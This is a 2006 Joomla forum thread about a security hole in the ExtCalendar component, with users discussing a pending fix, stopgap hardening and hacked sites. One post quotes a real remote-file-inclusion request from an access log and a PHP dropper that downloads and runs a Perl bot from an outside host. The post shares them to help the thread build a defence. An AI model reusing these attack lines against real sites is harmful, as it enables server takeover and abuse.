Okay....mmmm... Elpie is the name, and the avatar is very feminine but definitely not a David...Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David. Has he had surgery?
[UPGRADE AVAIL.] ExtCalendar Vulnerability
Moderator: General Support Moderators
Forum rules
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
Last edited by RobinH on Fri Jul 14, 2006 4:40 pm, edited 1 time in total.
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
Buster,Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David. Has he had surgery?
your post is almost at the bottom of page no. 3...guess what has been written befiore?
what happend to that avatar of yours anyhow?
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
if you tell Lynne that she has had surgery....beware!RobinH wrote:Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David. Has he had surgery?
cheers
Leo
Last edited by leolam on Fri Jul 14, 2006 4:52 pm, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
By the way Buster, the readme file is from a David, so it appears to be a team effort!
Last edited by RobinH on Fri Jul 14, 2006 4:41 pm, edited 1 time in total.
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
Elpie,
the read-me file has some issues..i have send them to you...your pm is almost full..cheers
Leo
the read-me file has some issues..i have send them to you...your pm is almost full..cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: ExtCalendar
May I insist, as this thread is getting quite complex, for all to keep OT?
No flame, no surgery please.
Keep the flame personal and the surgery to the humour zone.
Any further OT will be edited/deleted.
No flame, no surgery please.
Keep the flame personal and the surgery to the humour zone.
Any further OT will be edited/deleted.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- Buster
- Joomla! Guru
- Posts: 619
- Joined: Mon Nov 28, 2005 10:29 am
- Location: England
Re: ExtCalendar
Hi Robin
thanks for letting me know. I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?
Buster
PS. Infograf, no worries Leolam loves me really it's a football thing!
thanks for letting me know. I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?
Buster
PS. Infograf, no worries Leolam loves me really it's a football thing!
A true Panspermian........aren't we all?
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
You'd have to contact Elpie... I boo boo'd...Buster wrote: Hi Robin
thanks for letting me know. I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?
Buster
PS. Infograf, no worries Leolam loves me really it's a football thing!
-
- Joomla! Explorer
- Posts: 251
- Joined: Mon Sep 05, 2005 3:50 pm
Re: ExtCalendar
To clear up any confusion, I'm the David working on the security release of ExtCalendar and I'm not David Raison. I just stepped up to the plate to help out with a security release of ExtCalendar. This is going to be a security only update.
A few more issues to resolve and we should be good to go.
david
A few more issues to resolve and we should be good to go.
david
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
Hey David, I posted my testing results over on Mambo Guru Forums. Didn't know who to send them to and had to go catch some z's. PM'd Elpie but she was offline and I had to go and didn't want anyone to miss the results. She PM'd me earlier about the testing. I'll pop off one to you too. Thanks for inviting me to help with the testing!davidrrm wrote: To clear up any confusion, I'm the David working on the security release of ExtCalendar and I'm not David Raison. I just stepped up to the plate to help out with a security release of ExtCalendar. This is going to be a security only update.
A few more issues to resolve and we should be good to go.
david
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
Ok, I guess there is enough confusion out there that perhaps some clarity should be given.
The original developer of ExtCalendar, David Raison, stopped working on it some time ago. When the security issues came up, I tried to contact him with no success, as did members of the Joomla team. There are too many people using ExtCalendar for it to just be left as abandonware so when davidrrm offered his help with it on this forum and nobody took him up on the offer, I contacted him and also asked Martin Brampton (counterpoint) if they were prepared to work together to bring us a security update. David is a hugely talented and experienced coder, as is Martin, and I am not working on this code at all. My contribution is simply in bringing the people together, helping the guys where I can, and taking care of the information and people side of things
As Phil said, we found there was a lot more work involved than originally anticipated and discovered a number of potential vulnerabilities (that have not, as yet, become exploits). We have RC2 out for testing and are trying to get this out to you as soon as possible.
The original developer of ExtCalendar, David Raison, stopped working on it some time ago. When the security issues came up, I tried to contact him with no success, as did members of the Joomla team. There are too many people using ExtCalendar for it to just be left as abandonware so when davidrrm offered his help with it on this forum and nobody took him up on the offer, I contacted him and also asked Martin Brampton (counterpoint) if they were prepared to work together to bring us a security update. David is a hugely talented and experienced coder, as is Martin, and I am not working on this code at all. My contribution is simply in bringing the people together, helping the guys where I can, and taking care of the information and people side of things
As Phil said, we found there was a lot more work involved than originally anticipated and discovered a number of potential vulnerabilities (that have not, as yet, become exploits). We have RC2 out for testing and are trying to get this out to you as soon as possible.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Apprentice
- Posts: 8
- Joined: Thu Jul 13, 2006 12:51 pm
Re: ExtCalendar
Any news? I'm being patient, but I swear I check this thread at least two times every hour, hoping that the email notification didn't work and there's a new reply with news of the security fix waiting for me. I'm eagerly anticipating it! Thanks again to those of you working on this project. I appreciate your efforts!!
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
This is a little bit much more than a security fix......many people around the globe are now testing version RC2 and believe me it looks very promissing and I expect that the developers can release very quickly now...It will take another day or so depending on what "elpie" we find but they (Martin, David and Elpie and many more now involved) are amazing talented people bringing the goods to us in this community. Be patient and your rewards will be endless...these people do not provide quick fixes They provide structural solutions.....and again from our testings as well the solution looks quit good! soon my friend....soon....boardmoose wrote: Any news? I'm being patient, but I swear I check this thread at least two times every hour, hoping that the email notification didn't work and there's a new reply with news of the security fix waiting for me. I'm eagerly anticipating it! Thanks again to those of you working on this project. I appreciate your efforts!!
cheers
Leo
edited: because amazing interference
Last edited by leolam on Tue Jul 18, 2006 9:39 am, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
Initial results look VERY proimising!
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Jul 17, 2006 11:30 am
Re: ExtCalendar
Hi Robin,
Do you have any news an I worried about my site and would like to know what to do asap.
Thank you, Kindest Regards, Emma
Do you have any news an I worried about my site and would like to know what to do asap.
Thank you, Kindest Regards, Emma
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
Emma, please disable your ExtCalendar by changing file permissions to 000. We are in the final phases of testing but as this is a full upgrade that fixes a lot of security issues it has been a lot more work than just a simple patch. I can't give a time for its release but we are trying to get a stable, fully-tested upgrade out as soon as possible.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
I'm not responsible for the release, just helping with testing, so not sure when its coming out but again - feel it'll be very soon.
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Jul 17, 2006 11:30 am
Re: ExtCalendar
Thanks for the info...i dont really want to have to do that though as it is a main source of info on the site. Is there any other temporary solution for now you can think of?
Kindest Regards, Emma
Kindest Regards, Emma
- nathandiehl
- Joomla! Champion
- Posts: 6044
- Joined: Fri Aug 19, 2005 3:03 pm
- Location: Indiana, USA
- Contact:
Re: ExtCalendar
Emma,
a temporary solution could be to run RC2 on your life site, but this is certainly not stable, and they don't know if it's secure or not.
the ONLY sure thing is to disable extCal.
a temporary solution could be to run RC2 on your life site, but this is certainly not stable, and they don't know if it's secure or not.
the ONLY sure thing is to disable extCal.
If you're new to Joomla, Please read Anna's Joomla! Tips: http://forum.joomla.org/viewtopic.php?t=5503
http://nathandiehl.com | Find out what makes me tick
http://nathandiehl.com | Find out what makes me tick
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
You could go through every single file and add this to the top (just below the < ? php starting code)
This will help defend against the most common attack we are seeing against ExtCalendar BUT it will still not be secure. If you can, also set register_globals OFF (your host may be willing to do this so globals are off server-wide, which they should be for security) - there is more information about register_globals in this forum. That will also help protect your site, but not completely secure ExtCalendar.
Most importantly, BACKUP, BACKUP, BACKUP. There is a risk your site may be found by hackers, but you are the only one to decide what level of risk you are prepared to take. With daily backups of your database (and files if restoring them from scratch would be a hassle) you can at least come back fairly quickly if your site is exploited. Up to you to decide.
Code: Select all
// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
Most importantly, BACKUP, BACKUP, BACKUP. There is a risk your site may be found by hackers, but you are the only one to decide what level of risk you are prepared to take. With daily backups of your database (and files if restoring them from scratch would be a hassle) you can at least come back fairly quickly if your site is exploited. Up to you to decide.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
RC2 is not available to anyone except our testers at the moment nathan. Because we are doing extensive testing on it we are also uncovering a few bugs that must have been bothering people for some time. We did not intend to do more than a security release, but we have ended up fixing a few things as well. An RC3 will be out today and hopefully this will pass our rigorous testing and we will be good to go.nathandiehl wrote: a temporary solution could be to run RC2 on your life site, but this is certainly not stable, and they don't know if it's secure or not.
The upgrade is being designed to work with both Joomla and Mambo, is being tested across versions and on both Linux and IIS. We felt ExtCalendar is too important to too many people for the release to be rushed and we want to be as sure as possible that its a solid upgrade.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
- sc00zy
- Joomla! Exemplar
- Posts: 9532
- Joined: Thu Aug 18, 2005 9:07 am
- Location: Assen, Netherlands
- Contact:
Re: ExtCalendar
Simply set all permissions on files and folders within com_extcalendar would be fine?Elpie wrote: Emma, please disable your ExtCalendar by changing file permissions to 000. We are in the final phases of testing but as this is a full upgrade that fixes a lot of security issues it has been a lot more work than just a simple patch. I can't give a time for its release but we are trying to get a stable, fully-tested upgrade out as soon as possible.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau
https://welldotcom.nl - Puntgaaf Internetbureau
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
If you set them to 000, so nobody and no user and no group has access, you will completely disable ExtCalendar but it should then be safe until we can release the update. Removing all ExtCalendar files through FTP will have the same effect - DON'T remove through Joomla or you will lose all your ExtCalendar data tables and lose all information. If you want to keep it running on your site though you will need to follow the advice I gave Emma and weigh up the risks of it possibly being exploited.sc00zy wrote: Simply set all permissions on files and folders within com_extcalendar would be fine?
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
- sc00zy
- Joomla! Exemplar
- Posts: 9532
- Joined: Thu Aug 18, 2005 9:07 am
- Location: Assen, Netherlands
- Contact:
Re: ExtCalendar
Thanks. I will temporary delete the files.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau
https://welldotcom.nl - Puntgaaf Internetbureau
-
- Joomla! Ace
- Posts: 1942
- Joined: Thu Aug 18, 2005 5:53 pm
- Location: Washington D.C. & Baltimore, MD Metro
- Contact:
Re: ExtCalendar
Hi all,
After scanning through the pages of this thread I didn't see any mention of extcal being used for SPAM purposes.
My personal site was hacked via extcal and used to send out SPAM. The SPAM was sent out using the backend extcal admin configuration where you can configure the "admin" to be notified of new front-end submissions.
The funny thing is is that I had previously removed any mention of extcal in my menu's and had already removed the publicly viewable extcal public copyright notices, as well as unpublished any and all references to extcal (since I was no longer using it on my site). I had just never uninstalled it.
Yet it still got hacked. I also find it interesting that my personal site has never been submitted to ANY search engines, yet somehow it was found and used.
Just my 2-cents and thought I'd report on the SPAM aspect since I didn't see it mentioned anywhere.
--Roger
After scanning through the pages of this thread I didn't see any mention of extcal being used for SPAM purposes.
My personal site was hacked via extcal and used to send out SPAM. The SPAM was sent out using the backend extcal admin configuration where you can configure the "admin" to be notified of new front-end submissions.
The funny thing is is that I had previously removed any mention of extcal in my menu's and had already removed the publicly viewable extcal public copyright notices, as well as unpublished any and all references to extcal (since I was no longer using it on my site). I had just never uninstalled it.
Yet it still got hacked. I also find it interesting that my personal site has never been submitted to ANY search engines, yet somehow it was found and used.
Just my 2-cents and thought I'd report on the SPAM aspect since I didn't see it mentioned anywhere.
--Roger
Thanks,
Roger Raymond
Techno Puzzle
Roger Raymond
Techno Puzzle
-
- Joomla! Fledgling
- Posts: 3
- Joined: Tue Jul 18, 2006 12:19 am
Re: ExtCalendar -- here is the script used to break in
Hello Everyone,
My calendar was hacked as well so I've disabled it. They came back today and I found some interesting breadcrumbs in the access_log.
Perhaps this will help devise a defense.
Which grabs these interesting scripts:
http://www.aol.eu.com/nowka.txt for example is a spreader/portscanner/udpflooder
So now what should we do if our systems are compromised (change passwords, permissions)?
Suggestions?
Thanks
Tony
My calendar was hacked as well so I've disabled it. They came back today and I found some interesting breadcrumbs in the access_log.
Perhaps this will help devise a defense.
Code: Select all
9600: 65.75.190.45 - - [17/Jul/2006:20:09:10 -0400] "GET /web/component/option,com_extcalendar/Itemid,/extmode,view/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.aol.eu.com/cc2.php??
Code: Select all
<?
shell_exec('cd /tmp;wget http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;curl -O http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;lwp-download http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;lynx -source http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
shell_exec('cd /tmp;fetch http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
shell_exec('cd /tmp;GET http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
?>
So now what should we do if our systems are compromised (change passwords, permissions)?
Suggestions?
Thanks
Tony
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
Tony, please read the threads here about what to do if you have been hacked.
This exploit needed only one thing on your site for it to be run - register_globals On. There is information here about how to turn register_globals Off if your host won't do that for you.
What you need to do now is this:
1. contact your host and inform them that your site has been hacked (and give them the log information you posted here)
Ask your host to change register_globals to Off.
2.If your host has a full backup, you should clean out the injected files then restore your site from backup. It is extremely important that you dont miss any hacker files.
3. Read the posts here about securing your site.
4. Trace the owner of the IP that was used and report the abuse.
5. Contact aol.eu.com and report the abuse.
Good luck!
This exploit needed only one thing on your site for it to be run - register_globals On. There is information here about how to turn register_globals Off if your host won't do that for you.
What you need to do now is this:
1. contact your host and inform them that your site has been hacked (and give them the log information you posted here)
Ask your host to change register_globals to Off.
2.If your host has a full backup, you should clean out the injected files then restore your site from backup. It is extremely important that you dont miss any hacker files.
3. Read the posts here about securing your site.
4. Trace the owner of the IP that was used and report the abuse.
5. Contact aol.eu.com and report the abuse.
Good luck!
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Apprentice
- Posts: 9
- Joined: Thu Aug 18, 2005 12:30 pm
Re: ExtCalendar
Hi All,
I was also hacked and I changed the globals.php file as mentioned somewhere else on this site by RobS. (Changed the rg_emulation to 0). Everything seemed to work just fine except the Joomlaboard and pmsII. I had to change it back unfortunately.
Just in case someone else wants to do this for security.
I was also hacked and I changed the globals.php file as mentioned somewhere else on this site by RobS. (Changed the rg_emulation to 0). Everything seemed to work just fine except the Joomlaboard and pmsII. I had to change it back unfortunately.
Just in case someone else wants to do this for security.
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Jul 17, 2006 11:30 am
Re: ExtCalendar
just changed file permissions to 000 and it has taken down the whole site...please help me asap.
-
- Joomla! Champion
- Posts: 5883
- Joined: Tue Aug 23, 2005 1:56 pm
- Location: South coast, UK
- Contact:
Re: ExtCalendar
Change them back and then change each one,one at a time and check your site. I suspect that you have changed other files than extcalendar.
https://gadsolutions.biz Electrical services
https://electrical-testing-safety.co.uk Testing services
https://electrical-testing-safety.co.uk Testing services